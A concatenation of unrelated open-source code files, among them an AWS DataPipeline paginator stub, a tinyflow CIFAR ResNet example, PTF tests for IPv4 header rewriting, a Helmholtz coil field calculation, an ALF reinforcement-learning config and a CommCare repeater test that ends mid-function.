- **hasMoreResults** *(boolean) --*
Indicates whether there are more results that can be obtained by a subsequent call.
- **NextToken** *(string) --*
A token to resume pagination.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class QueryObjects(Paginator):
def paginate(self, pipelineId: str, sphere: str, query: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.query_objects`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/QueryObjects>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
pipelineId='string',
query={
'selectors': [
{
'fieldName': 'string',
'operator': {
'type': 'EQ'|'REF_EQ'|'LE'|'GE'|'BETWEEN',
'values': [
'string',
]
}
},
]
},
sphere='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ids': [
'string',
],
'hasMoreResults': True|False,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of QueryObjects.
- **ids** *(list) --*
The identifiers that match the query selectors.
- *(string) --*
- **hasMoreResults** *(boolean) --*
Indicates whether there are more results that can be obtained by a subsequent call.
- **NextToken** *(string) --*
A token to resume pagination.
:type pipelineId: string
:param pipelineId: **[REQUIRED]**
The ID of the pipeline.
:type query: dict
:param query:
The query that defines the objects to be returned. The ``Query`` object can contain a maximum of ten selectors. The conditions in the query are limited to top-level String fields in the object. These filters can be applied to components, instances, and attempts.
- **selectors** *(list) --*
List of selectors that define the query. An object must satisfy all of the selectors to match the query.
- *(dict) --*
A comparison that is used to determine whether a query should return this object.
- **fieldName** *(string) --*
The name of the field that the operator will be applied to. The field name is the \"key\" portion of the field definition in the pipeline definition syntax that is used by the AWS Data Pipeline API. If the field is not set on the object, the condition fails.
- **operator** *(dict) --*
Contains a logical operation for comparing the value of a field with a specified value.
- **type** *(string) --*
The logical operation to be performed: equal (``EQ`` ), equal reference (``REF_EQ`` ), less than or equal (``LE`` ), greater than or equal (``GE`` ), or between (``BETWEEN`` ). Equal reference (``REF_EQ`` ) can be used only with reference fields. The other comparison types can be used only with String fields. The comparison types you can use apply only to certain object fields, as detailed below.
The comparison operators EQ and REF_EQ act on the following fields:
* name
* @sphere
* parent
* @componentParent
* @instanceParent
* @status
* @scheduledStartTime
* @scheduledEndTime
* @actualStartTime
* @actualEndTime
The comparison operators ``GE`` , ``LE`` , and ``BETWEEN`` act on the following fields:
* @scheduledStartTime
* @scheduledEndTime
* @actualStartTime
* @actualEndTime
Note that fields beginning with the at sign (@) are read-only and set by the web service. When you name fields, you should choose names containing only alpha-numeric values, as symbols may be reserved by AWS Data Pipeline. User-defined fields that you add to a pipeline should prefix their name with the string \"my\".
- **values** *(list) --*
The value that the actual field value will be compared with.
- *(string) --*
:type sphere: string
:param sphere: **[REQUIRED]**
Indicates whether the query applies to components or instances. The possible values are: ``COMPONENT`` , ``INSTANCE`` , and ``ATTEMPT`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
|
example/cifar_resnet.py
|
chakpongchung/tinyflow
| 2,035 |
70179
|
import tinyflow as tf
from tinyflow.datasets import get_cifar10
import numpy as np
num_epoch = 10
num_batch = 600
batch_size = 100
def conv_factory(x, filter_size, in_filters, out_filters):
x = tf.nn.conv2d(x, num_filter=out_filters,
ksize=[1, filter_size, filter_size, 1], padding='SAME')
x = tf.nn.batch_normalization(x)
x = tf.nn.relu(x)
return x
def residual_factory(x, in_filters, out_filters):
if in_filters == out_filters:
orig_x = x
conv1 = conv_factory(x, 3, in_filters, out_filters)
conv2 = conv_factory(conv1, 3, out_filters, out_filters)
new = orig_x + conv2
return tf.nn.relu(new)
else:
conv1 = conv_factory(x, 3, in_filters, out_filters)
conv2 = conv_factory(conv1, 3, out_filters, out_filters)
project_x = conv_factory(x, 1, in_filters, out_filters)
new = project_x + conv2
return tf.nn.relu(new)
def resnet(x, n, in_filters, out_filters):
for i in range(n):
if i == 0:
x = residual_factory(x, in_filters, 16)
else:
x = residual_factory(x, 16, 16)
for i in range(n):
if i == 0:
x = residual_factory(x, 16, 32)
else:
x = residual_factory(x, 32, 32)
for i in range(n):
if i == 0:
x = residual_factory(x, 32, 64)
else:
x = residual_factory(x, 64, 64)
return x
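# Note (added comment): with n=1 each of the three loops above stacks one residual unit
# per stage, widening the feature maps from in_filters to 16, then 32, then 64 channels;
# the first unit of each stage changes the channel count, so it takes the 1x1 projection
# branch in residual_factory.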
x = tf.placeholder(tf.float32)
conv1 = tf.nn.conv2d(x, num_filter=16, ksize=[1, 5, 5, 1], padding='SAME')
tanh1 = tf.tanh(conv1)
res = resnet(tanh1, 1, 16, 64)
pool1 = tf.nn.avg_pool(res, ksize=[1, 4, 4, 1], strides=[1, 2, 2, 1], padding='SAME', data_format='NCHW')
conv2 = tf.nn.conv2d(pool1, num_filter=16, ksize=[1, 5, 5, 1])
flatten = tf.nn.flatten_layer(conv2)
fc1 = tf.nn.linear(flatten, num_hidden=10, name="fc1")
# define loss
label = tf.placeholder(tf.float32)
cross_entropy = tf.nn.mean_sparse_softmax_cross_entropy_with_logits(fc1, label)
train_step = tf.train.AdamOptimizer(0.0005).minimize(cross_entropy)
sess = tf.Session(config='gpu')
# Automatic variable shape inference API: infers the shapes and initializes the weights.
known_shape = {x: [batch_size, 3, 32, 32], label: [batch_size]}
stdev = 0.01
init_step = []
for v, name, shape in tf.infer_variable_shapes(
cross_entropy, feed_dict=known_shape):
init_step.append(tf.assign(v, tf.normal(shape, stdev)))
print("shape[%s]=%s" % (name, str(shape)))
sess.run(init_step)
sess.run(tf.initialize_all_variables())
# get the cifar dataset
cifar = get_cifar10()
for epoch in range(num_epoch):
sum_loss = 0.0
for i in range(num_batch):
batch_xs, batch_ys = cifar.train.next_batch(batch_size)
loss, _ = sess.run([cross_entropy, train_step], feed_dict={x: batch_xs, label:batch_ys})
sum_loss += loss
print("epoch[%d] cross_entropy=%g" % (epoch, sum_loss /num_batch))
correct_prediction = tf.equal(tf.argmax(fc1, 1), label)
accuracy = tf.reduce_mean(correct_prediction)
print(sess.run(accuracy, feed_dict={x: cifar.test.images, label: cifar.test.labels}))
|
kivymd/uix/pickers/colorpicker/__init__.py
|
marvelous-benji/KivyMD
| 1,111 |
70202
|
from .colorpicker import MDColorPicker # NOQA F401
|
pyjswidgets/pyjamas/chart/TouchedPointUpdateOption.py
|
takipsizad/pyjs
| 739 |
70220
|
"""
* Copyright 2007,2008,2009 <NAME>
* Copyright (C) 2009 <NAME> <<EMAIL>>
*
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific
* language governing permissions and limitations under the
* License.
*
"""
"""*
* Defines how the <tt>update</tt> method updates the touched
* point, that is, the point the user is considered to be
* hovered over.
*
* @see #update(TouchedPointUpdateOption) update
*
"""
class TouchedPointUpdateOption(object):
def __init__(self):
pass
"""*
* When this option is passed to the update method, any
* touched point is cleared as a consequence of the update.
* <p>
*
* This option can be used when you want to "start fresh"
* with regards to hover feedback after an update, and want
* to assure that only explicit user-generated mouse move
* actions (rather than objects moving <i>underneath</i> a
* fixed-position mouse cursor) can trigger hover feedback.
*
* @see #update update
* @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED
* @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED
*
"""
TOUCHED_POINT_CLEARED = TouchedPointUpdateOption()
"""*
* When this option is passed to the update method, any
* previously touched point is locked in (remains unchanged).
* <p>
*
* For example, if the mouse is over a certain point before
* the update, and that point moves away from the mouse
* (without the mouse moving otherwise) as a consequence of
* the update, the hover feedback remains "locked in" to the
* original point, even though the mouse is no longer on top
* of that point.
* <p>
*
* This option is useful for hover widgets that modify the
* position, size, symbol of points/curves, and do not want the
* selected point/curve (and popup hover widget) to change as
* a consequence of such changes.
* <p>
*
* <i>Note:</i> If the currently touched point or the curve
* containing it is deleted, GChart sets the touched point
* reference to <tt>None</tt>. In that case, this option and
* <tt>TOUCHED_POINT_CLEARED</tt> behave the same way.
*
*
* @see #update update
* @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED
* @see #TOUCHED_POINT_UPDATED TOUCHED_POINT_UPDATED
*
"""
TOUCHED_POINT_LOCKED = TouchedPointUpdateOption()
"""*
* When this option is passed to the update method, the
* touched point is updated so that it reflects whatever point
* is underneath the mouse cursor after the update
* completes.
* <p>
*
* For example, if the mouse is not hovering over any point
* before the update, but the update repositions one of the
* points so that it is now underneath the mouse cursor,
* the hover feedback for that point will be displayed.
* Similarly, if the update moves a point away from the
* mouse cursor, previously displayed hover feedback will
* be eliminated.
* <p>
*
* @see #update update
* @see #TOUCHED_POINT_CLEARED TOUCHED_POINT_CLEARED
* @see #TOUCHED_POINT_LOCKED TOUCHED_POINT_LOCKED
*
"""
TOUCHED_POINT_UPDATED = TouchedPointUpdateOption()
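# Usage sketch (illustrative, assuming a GChart instance named chart, per the
# update() references in the docstrings above):
#   chart.update(TOUCHED_POINT_LOCKED)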
|
backends/ubpf/tests/ptf/ipv4_actions_test.py
|
anasyrmia/p4c-1
| 487 |
70226
|
#!/usr/bin/env python
# Copyright 2019 Orange
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ptf.mask import Mask
from ptf.packet import TCP, IP, Ether
from base_test import P4rtOVSBaseTest
from ptf.testutils import send_packet, verify_packets, simple_ip_packet
class Ipv4Test(P4rtOVSBaseTest):
def setUp(self):
P4rtOVSBaseTest.setUp(self)
self.del_flows()
self.unload_bpf_program()
self.load_bpf_program(path_to_program="build/test-ipv4-actions.o")
self.add_bpf_prog_flow(1,2)
self.add_bpf_prog_flow(2,1)
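# Note on the map layout used by the tests below (inferred from the key/value strings they
# pass, so treat it as an assumption about test-ipv4-actions.o rather than a specification):
# the 4-byte key is the IPv4 source address in little-endian byte order
# ("1 1 168 192" -> 192.168.1.1), and the 12-byte value is a 4-byte action id followed by
# the action parameter (e.g. "8 0 0 0 2 2 168 192 0 0 0 0" selects the set-source action
# with 192.168.2.2).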
class Ipv4SetVersionTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="0 0 0 0 5 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", version=4) / TCP() / "Ala a un chat"
exp_pkt = Ether() / IP(src="192.168.1.1", version=5) / TCP() / "Ala a un chat"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetIhlTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="1 0 0 0 15 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=10)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=15)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetDiffservTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="2 0 0 0 255 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_tos=10)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_tos=255)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetIdentificationTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="3 0 0 0 211 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_id=10)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_id=211)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFlagsTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="4 0 0 0 7 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", flags=0) / TCP() / "Ala a un chat"
exp_pkt = Ether() / IP(src="192.168.1.1", flags=7) / TCP() / "Ala a un chat"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFragOffsetTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="5 0 0 0 13 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", frag=0) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", frag=13) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetTtlTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="6 0 0 0 60 0 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ttl=64)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ttl=60)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetProtocolTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="7 0 0 0 55 0 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1") / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", proto=55) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetSrcTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="8 0 0 0 2 2 168 192 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1")
exp_pkt = simple_ip_packet(ip_src="192.168.2.2")
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetDstTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="9 0 0 0 2 2 168 192 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_dst="192.168.1.2")
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_dst="192.168.2.2")
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetSrcDstTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="10 0 0 0 10 10 10 10 10 10 10 10")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_dst="192.168.1.2")
exp_pkt = simple_ip_packet(ip_src="10.10.10.10", ip_dst="10.10.10.10")
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetIhlDiffservTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="11 0 0 0 15 26 0 0 0 0 0 0")
def runTest(self):
pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=10, ip_tos=0)
exp_pkt = simple_ip_packet(ip_src="192.168.1.1", ip_ihl=15, ip_tos=26)
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFragmentOffsetFlagTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="12 0 0 0 13 0 7 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", frag=0, flags=0) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", frag=13, flags=7) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFlagsTtlTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="13 0 0 0 7 50 0 0 0 0 0 0")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", flags=0, ttl=64) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="192.168.1.1", flags=7, ttl=50) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
class Ipv4SetFragOffsetSrcTest(Ipv4Test):
def setUp(self):
Ipv4Test.setUp(self)
self.update_bpf_map(map_id=0, key="1 1 168 192", value="14 0 0 0 255 31 0 0 255 255 255 255")
def runTest(self):
pkt = Ether() / IP(src="192.168.1.1", frag=0) / TCP() / "Ala ma kota"
exp_pkt = Ether() / IP(src="255.255.255.255", frag=8191) / TCP() / "Ala ma kota"
mask = Mask(exp_pkt)
mask.set_do_not_care_scapy(IP, 'chksum')
mask.set_do_not_care_scapy(TCP, 'chksum')
send_packet(self, (0, 1), pkt)
verify_packets(self, mask, device_number=0, ports=[2])
|
packages/3d_plotting/examples/compute_field.py
|
zmoon/scipy-lecture-notes
| 2,538 |
70251
|
"""
Helmholtz coils
===============
A script that computes the magnetic field generated by a pair of Helmholtz
coils.
"""
import numpy as np
from scipy import special, linalg
##############################################################################
# Function to calculate the field of a loop
def base_vectors(n):
""" Returns 3 orthognal base vectors, the first one colinear to n.
"""
# normalize n
n = n / np.sqrt(np.square(n).sum(axis=-1))
# choose two vectors perpendicular to n
    # choice is arbitrary since the coil is symmetric about n
    if abs(n[0]) == 1:
l = np.r_[n[2], 0, -n[0]]
else:
l = np.r_[0, n[2], -n[1]]
l = l / np.sqrt(np.square(l).sum(axis=-1))
m = np.cross(n, l)
return n, l, m
def B_field(r, n, r0, R):
"""
returns the magnetic field from an arbitrary current loop calculated from
eqns (1) and (2) in Phys Rev A Vol. 35, N 4, pp. 1535-1546; 1987.
Parameters
----------
n is normal vector to the plane of the loop at the center, current
is oriented by the right-hand-rule.
r is a position vector where the Bfield is evaluated:
        [x1 y1 z1 ; x2 y2 z2 ; ... ]
r is in units of d
r0 is the location of the center of the loop in units of d: [x y z]
R is the radius of the loop
Returns
-------
B is a vector for the B field at point r in inverse units of
(mu I) / (2 pi d)
for I in amps and d in meters and mu = 4 pi * 10^-7 we get Tesla
"""
### Translate the coordinates in the coil's frame
n, l, m = base_vectors(n)
    # transformation matrix from the coil frame to the lab frame
trans = np.vstack((l, m, n))
    # transformation matrix from the lab frame to the coil frame
inv_trans = linalg.inv(trans)
r = r - r0 #point location from center of coil
r = np.dot(r, inv_trans) #transform vector to coil frame
#### calculate field
# express the coordinates in polar form
x = r[:, 0]
y = r[:, 1]
z = r[:, 2]
rho = np.sqrt(x**2 + y**2)
theta = np.arctan(x / y)
# NaNs are generated where y is zero.
theta[y == 0] = np.pi / 2
E = special.ellipe((4 * R * rho)/( (R + rho)**2 + z**2))
K = special.ellipk((4 * R * rho)/( (R + rho)**2 + z**2))
dist = ((R - rho)**2 + z**2)
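    # The expressions below implement the loop-field components in terms of the
    # complete elliptic integrals K and E (in the units stated in the docstring):
    #   Bz   = 1/sqrt((R+rho)^2 + z^2) * (  K + E*(R^2 - rho^2 - z^2)/dist )
    #   Brho = z/(rho*sqrt((R+rho)^2 + z^2)) * ( -K + E*(R^2 + rho^2 + z^2)/dist )
    # with dist = (R - rho)^2 + z^2.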
Bz = 1 / np.sqrt((R + rho)**2 + z**2) * (
K
+ E * (R**2 - rho**2 - z**2) / dist
)
Brho = z / (rho*np.sqrt((R + rho)**2 + z**2)) * (
-K
+ E * (R**2 + rho**2 + z**2)/ dist
)
    # On the axis of the coil we get a division by zero here. This returns a
    # NaN where the field is actually zero:
Brho[dist == 0] = 0
Brho[rho == 0] = 0
Bz[dist == 0] = 0
B = np.c_[np.cos(theta)*Brho, np.sin(theta)*Brho, Bz ]
# Rotate the field back in the lab's frame
B = np.dot(B, trans)
return B
##############################################################################
# The grid of points on which we want to evaluate the field
X, Y, Z = np.mgrid[-0.15:0.15:31j, -0.15:0.15:31j, -0.15:0.15:31j]
# Avoid rounding issues :
f = 1e4 # this gives the precision we are interested in:
X = np.round(X * f) / f
Y = np.round(Y * f) / f
Z = np.round(Z * f) / f
# The (x, y, z) position vector
r = np.c_[np.ravel(X), np.ravel(Y), np.ravel(Z)]
##############################################################################
# The coil positions
# The center of the coil
r0 = np.r_[0, 0, 0.1]
# The normal to the coils
n = np.r_[0, 0, 1]
# The radius
R = 0.1
# Add the mirror image of this coil relative to the xy plane:
r0 = np.vstack((r0, -r0 ))
R = np.r_[R, R]
n = np.vstack((n, n)) # Helmholtz-like configuration
##############################################################################
# Calculate field
# First initialize a container matrix for the field vector :
B = np.zeros_like(r)
# Then loop through the different coils and sum the fields :
for this_n, this_r0, this_R in zip(n, r0, R):
this_n = np.array(this_n)
this_r0 = np.array(this_r0)
this_R = np.array(this_R)
B += B_field(r, this_n, this_r0, this_R)
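# Hedged follow-up (an added sketch, not part of the original script): reshape
# the flattened field back onto the evaluation grid and compute its magnitude.
Bx = B[:, 0].reshape(X.shape)
By = B[:, 1].reshape(X.shape)
Bz = B[:, 2].reshape(X.shape)
B_norm = np.sqrt(Bx**2 + By**2 + Bz**2)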
|
tests/licensedcode/data/datadriven/external/fossology-tests/CC/matching.py
|
s4-2/scancode-toolkit
| 1,511 |
70255
|
<gh_stars>1000+
# matching.py - bipartite graph maximum matching algorithms
#
# Copyright 2015 <NAME> <<EMAIL>>.
#
# This file is part of NetworkX.
#
# NetworkX is distributed under a BSD license; see LICENSE.txt for more
# information.
#
# This module uses material from the Wikipedia article Hopcroft--Karp algorithm
# <https://en.wikipedia.org/wiki/Hopcroft%E2%80%93Karp_algorithm>, accessed on
# January 3, 2015, which is released under the Creative Commons
# Attribution-Share-Alike License 3.0
# <http://creativecommons.org/licenses/by-sa/3.0/>. That article includes
# pseudocode, which has been translated into the corresponding Python code.
#
# Portions of this module use code from David Eppstein's Python Algorithms and
# Data Structures (PADS) library, which is dedicated to the public domain (for
# proof, see <http://www.ics.uci.edu/~eppstein/PADS/ABOUT-PADS.txt>).
"""Provides functions for computing a maximum cardinality matching in a
bipartite graph.
|
alf/examples/tutorial/off_policy_states_conf.py
|
www2171668/alf
| 175 |
70275
|
# Copyright (c) 2021 Horizon Robotics and ALF Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import torch
import alf
from alf.algorithms.off_policy_algorithm import OffPolicyAlgorithm
from alf.data_structures import AlgStep, LossInfo
from alf.tensor_specs import TensorSpec
class MyOffPolicyAlgorithm(OffPolicyAlgorithm):
def __init__(self,
observation_spec,
action_spec,
reward_spec=None,
env=None,
config=None,
debug_summaries=False):
rollout_state_spec = TensorSpec(shape=(), dtype=torch.int32)
train_state_spec = TensorSpec(shape=(2, ))
super().__init__(
env=env,
config=config,
debug_summaries=debug_summaries,
observation_spec=observation_spec,
action_spec=action_spec,
train_state_spec=train_state_spec,
rollout_state_spec=rollout_state_spec)
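    # Added annotation: the two steps below illustrate that rollout state and
    # train state are tracked independently. The rollout state is a scalar int32
    # counter that starts from the zero initial state on the first step of an
    # episode and is decremented on every rollout step, while the train state is
    # a 2-element float vector that is incremented on every training update.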
def rollout_step(self, inputs, state):
print("rollout_step: ", state)
is_first_steps = inputs.is_first()
is_zero_state = (state == 0)
assert torch.all(is_zero_state[is_first_steps])
return AlgStep(output=inputs.prev_action, state=state - 1)
def train_step(self, inputs, state, rollout_info):
print("train_step: ", state)
return AlgStep(output=inputs.prev_action, state=state + 1)
def calc_loss(self, info):
return LossInfo()
alf.config('create_environment', num_parallel_environments=10)
alf.config(
'TrainerConfig',
algorithm_ctor=MyOffPolicyAlgorithm,
whole_replay_buffer_training=False,
use_rollout_state=False,
mini_batch_length=2,
unroll_length=3,
mini_batch_size=4,
num_updates_per_train_iter=1,
num_iterations=1)
|
Stock/Trade/Broker/WebTrader.py
|
Leonardo-YXH/DevilYuan
| 135 |
70280
|
<reponame>Leonardo-YXH/DevilYuan
import ssl
import random
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.poolmanager import PoolManager
from .DyTrader import *
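# Added annotation (an inference, not stated in the original source): this
# adapter pins the urllib3 connection pool to ssl.PROTOCOL_TLSv1 so that any
# requests session it is mounted on negotiates TLSv1, presumably for broker
# endpoints that only accept older TLS versions.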
class Ssl3HttpAdapter(HTTPAdapter):
def init_poolmanager(self, connections, maxsize, block=False):
self.poolmanager = PoolManager(num_pools=connections,
maxsize=maxsize,
block=block,
ssl_version=ssl.PROTOCOL_TLSv1)
class WebTrader(DyTrader):
"""
    Base class for broker web trading interfaces
"""
name = 'Web'
heartBeatTimer = 60
pollingCurEntrustTimer = 1
    maxRetryNbr = 3 # maximum number of retries
def __init__(self, eventEngine, info, configFile=None, accountConfigFile=None):
super().__init__(eventEngine, info, configFile, accountConfigFile)
self._httpAdapter = None
def _preLogin(self):
        # start a session
self._session = requests.session()
if self._httpAdapter is not None:
self._session.mount('https://', self._httpAdapter())
# session headers
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
}
self._session.headers.update(headers)
def _postLogout(self):
self._session.close()
|
corehq/motech/tests/test_repeater_helpers.py
|
andyasne/commcare-hq
| 471 |
70296
|
<gh_stars>100-1000
from django.test.testcases import TestCase
from mock import patch
from corehq.form_processor.models import CommCareCaseSQL
from datetime import datetime
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
from corehq.motech.repeater_helpers import get_relevant_case_updates_from_form_json
class TestRepeaterHelpers(TestCase):
def setUp(self):
self.domain = 'test-domain'
self.extra_fields = []
self.form_question_values = {}
case_1_data = {
'case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
'domain': self.domain,
'type': 'paciente',
'name': 'case1',
'owner_id': 'owner_1',
'modified_by': 'modified_by',
}
case_2_data = {
'case_id': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
'domain': self.domain,
'type': 'casa',
'name': 'case2',
'owner_id': 'owner_2',
'modified_by': 'modified_by',
}
self.case_1 = create_commcare_case(case_1_data)
self.case_2 = create_commcare_case(case_2_data)
def tearDown(self):
self.case_1.delete()
self.case_2.delete()
@patch.object(CaseAccessors, 'get_cases')
def test__get_relevant_case_updates_from_form_json_with_case_types(self, get_cases):
get_cases.return_value = [self.case_1, self.case_2]
result = get_relevant_case_updates_from_form_json(
self.domain,
_get_form_json(),
['paciente'],
self.extra_fields
)
self.assertEqual(len(result), 2)
@patch.object(CaseAccessors, 'get_cases')
def test__get_relevant_case_updates_from_form_json_without_case_types(self, get_cases):
get_cases.return_value = [self.case_1, self.case_2]
result = get_relevant_case_updates_from_form_json(
self.domain,
_get_form_json(),
[],
self.extra_fields
)
self.assertEqual(len(result), 3)
def create_commcare_case(data):
cccsql = CommCareCaseSQL(
case_id=data['case_id'],
domain=data['domain'],
type=data['type'],
